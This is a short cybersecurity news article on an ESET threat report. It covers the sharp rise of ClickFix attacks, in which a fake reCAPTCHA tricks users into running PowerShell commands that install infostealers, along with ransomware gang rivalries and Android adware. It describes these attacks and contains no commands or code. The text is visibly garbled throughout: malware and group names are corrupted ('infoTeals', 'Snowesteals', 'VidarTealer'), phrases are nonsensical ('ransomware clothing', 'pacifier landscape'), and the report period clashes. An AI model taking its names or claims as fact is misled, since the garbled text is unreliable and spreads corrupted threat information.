Clickfix False Fail Message Malware spikes over 500%, occupy second place as the most abused attack vector

Clickfix is increasingly used to install infostealers
The attack vector experienced an increase of 500% over the past 6 months
Users are told to run commands in Powershell to resolve an error

The use of the clickfix attack vector has been shot up by 517% since the second half of 2024, making it the second most abused attack vector behind phishing.

The attack uses a fake reCAPTCHA to trick users into running code in a Powershell terminal as a ‘fix’ for a false error.

This causes malware and infostealers to be downloaded and performed on the target device, which then harvests and extracts sensitive data back to the hackers.

Infostealers on the way up

Esets H2 2025 threat Report explains how Clickfix is abused by hackers to distribute some of the most popular infoStealing Malware, including Lumma Stealer, VidarTealer, Stealc and Danabot.

The attack vector is so effective as it depends on using very simple instructions to trick users into running complex commands in the Powershell terminal. Many users will simply ignore or not understand the commands they run, rather than focusing on trying to resolve the error.

Clickfix is usually distributed via phishing -e emails leading the user to a fake site that requires re -capital confirmation to access. Powershell commands often bypass the antivirus software, making it a particularly effective way to compromise devices, especially if the hacker can get the user to do it for them.

In other infoTeals -News, Eet’s threat report shows that Snowesteals have overtaken Agent Tesla as the most registered infoTeals. Snowesteals were spotted used in a massive campaign that targeted hundreds of us and EU companies to steal credentials.

Ransomware -Bands experienced an unexpected stormy period thanks to attacks and rivals between different ransomware clothing. The Dragonforce group launched a spree of defacement campaigns against some of the most notorious ransomware groups including Blacklock, Mamona and Ransomware-as-A-Service Giant Ransomhub.

While there have been significant law enforcement operations against ransomware groups in the last several months, including 8base attacks, it seems that rivals have caused the most damage to ransomware -ecosystem.

On the phones in front, the recent range of kaleidoscopy infections has pushed up Android -Adware detections by 160%. Malware distributed through official app stores is nothing new, with the recent Sparkkitty Malware distributed through both the Apple App Store and the Google Play Store.

However, Kaleidoscope Malware used a double-shaped attacking method by running intrusive ads on the target device to generate advertising revenue while the infected target units with a malicious twin app downloaded via a third-party app store.

“From new social technical techniques to sophisticated mobile threats and major infoTeal disorders, the pacifier landscape in the first half of 2025 was anything but boring,” said Jiř’s Bodkáč eset director of threat prevention laboratories.

Must Read

Leave a Comment Cancel Reply